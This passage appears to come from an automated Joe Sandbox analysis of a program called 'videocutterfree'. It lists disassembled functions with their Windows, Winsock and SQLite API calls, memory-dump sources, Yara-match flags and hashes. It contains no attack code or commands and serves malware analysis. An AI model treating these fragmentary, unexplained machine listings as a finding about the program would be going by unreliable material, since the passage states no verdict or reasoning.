                                                                              • Instruction Fuzzy Hash: C0F0E932A48B1467E732265F5C4166BB2DCDBC37B4F10C53AF945A6502E759DF0002D4
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00992350
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 00992360
                                                                              • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 00992370
                                                                              • GetLastError.KERNEL32 ref: 0099237A
                                                                                • Part of subcall function 00991712: __EH_prolog.LIBCMT ref: 00991717
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID: pqcs
                                                                              • API String ID: 1619523792-2559862021
                                                                              • Opcode ID: 07ee96196047048aa33f3a815aefb6de36c2f6699e1e2bda64732683e5d07704
                                                                              • Instruction ID: 7278b6f5d4333c77d6989764fdd1562811bf70dac6020766760dd1d1637e0b65
                                                                              • Opcode Fuzzy Hash: 07ee96196047048aa33f3a815aefb6de36c2f6699e1e2bda64732683e5d07704
                                                                              • Instruction Fuzzy Hash: 7BF05471914304BFDB20BFBA9D0ABAB7BBCEB44711B004669F806D7150F775E9049791
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00994035
                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00994042
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00994049
                                                                              • std::exception::exception.LIBCMT ref: 00994063
                                                                                • Part of subcall function 00999479: __EH_prolog.LIBCMT ref: 0099947E
                                                                                • Part of subcall function 00999479: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 0099948D
                                                                                • Part of subcall function 00999479: __CxxThrowException@8.LIBCMT ref: 009994AC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 3112922283-2104205924
                                                                              • Opcode ID: d6e1102d19fd98da8fa4d03b76251269e0f7af395603d29eb600baf080f0ed72
                                                                              • Instruction ID: 0d0d6567973d8509fa4387ab3daa5a3bca767b2aa26042e8f8ba041a2c6d651d
                                                                              • Opcode Fuzzy Hash: d6e1102d19fd98da8fa4d03b76251269e0f7af395603d29eb600baf080f0ed72
                                                                              • Instruction Fuzzy Hash: 64F08CB2D04209EBDF10FFE5DA09BEEBBBCEB44311F004219E915A2192DB7892048B91
                                                                              APIs
                                                                                • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                              • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                              • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                              • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                              • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                              • String ID:
                                                                              • API String ID: 683514883-0
                                                                              • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                              • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                              • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                              • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                              APIs
                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                              • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                              • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                              • String ID:
                                                                              • API String ID: 1903298374-0
                                                                              • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                              • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                              • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                              • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                              APIs
                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403919
                                                                              • GetFileType.KERNEL32(00000800), ref: 004039BF
                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00403A18
                                                                              • GetFileType.KERNEL32(00000000), ref: 00403A26
                                                                              • SetHandleCount.KERNEL32 ref: 00403A5D
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3873776800.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000005.00000002.3873776800.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: FileHandleType$CountInfoStartup
                                                                              • String ID:
                                                                              • API String ID: 1710529072-0
                                                                              • Opcode ID: 4510031a8605209d3dfb7fb84fc7b00f8c5fc6461cda088ad20275d2acfb4ccd
                                                                              • Instruction ID: f45e27808e37444d6d61e60d1d2a7dac726cde9b1c4190895e7af2971a6585cb
                                                                              • Opcode Fuzzy Hash: 4510031a8605209d3dfb7fb84fc7b00f8c5fc6461cda088ad20275d2acfb4ccd
                                                                              • Instruction Fuzzy Hash: D95122B16043418BD7209F28CD447663FA8AB01326F1A473AE4E6EB3E1D378CA54C75A
                                                                              APIs
                                                                                • Part of subcall function 009A0800: CloseHandle.KERNEL32(00000000,F3247817), ref: 009A0851
                                                                                • Part of subcall function 009A0800: WaitForSingleObject.KERNEL32(?,000000FF,F3247817,?,?,?,?,F3247817,009A07D3,F3247817), ref: 009A0868
                                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 009A0ACE
                                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 009A0AEE
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 009A0B27
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 009A0B7B
                                                                              • SetEvent.KERNEL32(?), ref: 009A0B82
                                                                                • Part of subcall function 0099418C: CloseHandle.KERNEL32(00000000,?,009A0AB5), ref: 009941B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 4166353394-0
                                                                              • Opcode ID: ccd95d63f0e5269ddf1529ff70f31a44fbfd5f6ebaa15ef5bac09dc33a29e441
                                                                              • Instruction ID: 27cce570b3845b6eb346c9c05fde78a842fd6deaf5b334a50e5e05437f98ad32
                                                                              • Opcode Fuzzy Hash: ccd95d63f0e5269ddf1529ff70f31a44fbfd5f6ebaa15ef5bac09dc33a29e441
                                                                              • Instruction Fuzzy Hash: 6941E1306043019FDF259F28CD81B1777A8EB86338F144668EC18DB2A2D735DC068BE5
                                                                              APIs
                                                                                • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                              • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                              • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                              • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                              • String ID:
                                                                              • API String ID: 1894464702-0
                                                                              • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                              • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                              • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                              • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 009920AC
                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009920CD
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009920D8
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0099213E
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009921A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                              • String ID:
                                                                              • API String ID: 1611172436-0
                                                                              • Opcode ID: 691f094c9553fcb04969cb104cc9ce1ca9abfc3f334303767016b1c748b5d4e6
                                                                              • Instruction ID: 1c83278adf2bb55a041b52b453ecf8a7ff44e6ba2cc4a937e86b0025f8386fe8
                                                                              • Opcode Fuzzy Hash: 691f094c9553fcb04969cb104cc9ce1ca9abfc3f334303767016b1c748b5d4e6
                                                                              • Instruction Fuzzy Hash: 8D317A71108701AFC720DF2AD885A6BB7E9FFD8720F140A1EF49683650D734E905DB91
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099CEAC
                                                                                • Part of subcall function 00991A01: TlsGetValue.KERNEL32 ref: 00991A0A
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0099CF2B
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0099CF47
                                                                              • InterlockedIncrement.KERNEL32(009C40F0), ref: 0099CF6C
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0099CF81
                                                                                • Part of subcall function 009927F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 0099284E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                              • String ID:
                                                                              • API String ID: 1578506061-0
                                                                              • Opcode ID: c5005c5952383fb9fde68f19fadd186054c71235af520e5a107c7156c650f934
                                                                              • Instruction ID: 1a15213002de0eafe476c6da7729f6fca2822717c9f9695a1c9d6f8feeb7463b
                                                                              • Opcode Fuzzy Hash: c5005c5952383fb9fde68f19fadd186054c71235af520e5a107c7156c650f934
                                                                              • Instruction Fuzzy Hash: 1D3159B19053059FDB10DFA9C944BAEBBF8FF48310F14851EE84AD7641E735AA04CBA0
                                                                              APIs
                                                                                • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                              • sqlite3_log.SQLITE3 ref: 609253E2
                                                                              • sqlite3_log.SQLITE3 ref: 60925406
                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                              • String ID:
                                                                              • API String ID: 3336957480-0
                                                                              • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                              • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                              • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                              • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                              APIs
                                                                              • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                              • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                              • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                              • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                              • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                              • String ID:
                                                                              • API String ID: 3091402450-0
                                                                              • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                              • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                              • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                              • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000), ref: 00992A3B
                                                                              • closesocket.WS2_32 ref: 00992A42
                                                                              • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 00992A89
                                                                              • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 00992A97
                                                                              • closesocket.WS2_32 ref: 00992A9E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastclosesocket$ioctlsocket
                                                                              • String ID:
                                                                              • API String ID: 1561005644-0
                                                                              • Opcode ID: 5fde9109a33859222f871d15a771a27e12eaa8217b72430bb49b9cab43e7acf6
                                                                              • Instruction ID: 9309858002f00bc4bd2d00f619a9c5adfe3e4d5a9c20eed2e8b353e4b47ea720
                                                                              • Opcode Fuzzy Hash: 5fde9109a33859222f871d15a771a27e12eaa8217b72430bb49b9cab43e7acf6
                                                                              • Instruction Fuzzy Hash: B121F276A10205BBDF20ABBC8D4476EB7EC9F84321F14466AE466D32D1EA749D408760
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                              • String ID:
                                                                              • API String ID: 251237202-0
                                                                              • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                              • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                              • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                              • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                                              APIs
                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                                              • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                                              • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3875146359.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                              • Associated: 00000005.00000002.3875129506.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875194818.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875224648.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875237988.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000005.00000002.3875252164.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_60900000_videocutterfree.jbxd
                                                                              Similarity
                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                                              • String ID:
                                                                              • API String ID: 4225432645-0
                                                                              • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                              • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                                              • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                                              • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 009AF160
                                                                                • Part of subcall function 009A1D5C: __FF_MSGBANNER.LIBCMT ref: 009A1D73
                                                                                • Part of subcall function 009A1D5C: __NMSG_WRITE.LIBCMT ref: 009A1D7A
                                                                                • Part of subcall function 009A1D5C: RtlAllocateHeap.NTDLL(00B10000,00000000,00000001), ref: 009A1D9F
                                                                              • _free.LIBCMT ref: 009AF173
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free_malloc
                                                                              • String ID:
                                                                              • API String ID: 1020059152-0
                                                                              • Opcode ID: b7fddcc7d5a701bbeda11fe3751bdecdffcecbdf7b35ffa0508906965effcb95
                                                                              • Instruction ID: e97c30ffb42cfc3f3d5c19c0dfcadf723a15201610dccfce1f6c511b6011f355
                                                                              • Opcode Fuzzy Hash: b7fddcc7d5a701bbeda11fe3751bdecdffcecbdf7b35ffa0508906965effcb95
                                                                              • Instruction Fuzzy Hash: 4511063240D615EFCF213FF4ED547993BA8AF82370B100536F949CB191DB3888809AD0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 009921DA
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009921ED
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 00992224
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 00992237
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00992261
                                                                                • Part of subcall function 00992341: InterlockedExchange.KERNEL32(?,00000001), ref: 00992350
                                                                                • Part of subcall function 00992341: InterlockedExchange.KERNEL32(?,00000001), ref: 00992360
                                                                                • Part of subcall function 00992341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 00992370
                                                                                • Part of subcall function 00992341: GetLastError.KERNEL32 ref: 0099237A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1856819132-0
                                                                              • Opcode ID: 402acec4c9493ddb1feea63e6e9b3bcdf310724396aa5e092277d433faa1eeff
                                                                              • Instruction ID: cf1bfe8750ccdc7b033119b4aacb735de2594329fcbd933cbd700eae3585e40a
                                                                              • Opcode Fuzzy Hash: 402acec4c9493ddb1feea63e6e9b3bcdf310724396aa5e092277d433faa1eeff
                                                                              • Instruction Fuzzy Hash: B9117272D18118EBCF15AFA9DD046AEBBBDFB48310F10462AF825E2261D7355A51EB80
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0099229D
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009922B0
                                                                              • TlsGetValue.KERNEL32 ref: 009922E7
                                                                              • TlsSetValue.KERNEL32(?), ref: 00992300
                                                                              • TlsSetValue.KERNEL32(?,?,?), ref: 0099231C
                                                                                • Part of subcall function 00992341: InterlockedExchange.KERNEL32(?,00000001), ref: 00992350
                                                                                • Part of subcall function 00992341: InterlockedExchange.KERNEL32(?,00000001), ref: 00992360
                                                                                • Part of subcall function 00992341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 00992370
                                                                                • Part of subcall function 00992341: GetLastError.KERNEL32 ref: 0099237A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_991000_videocutterfree.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1856819132-0
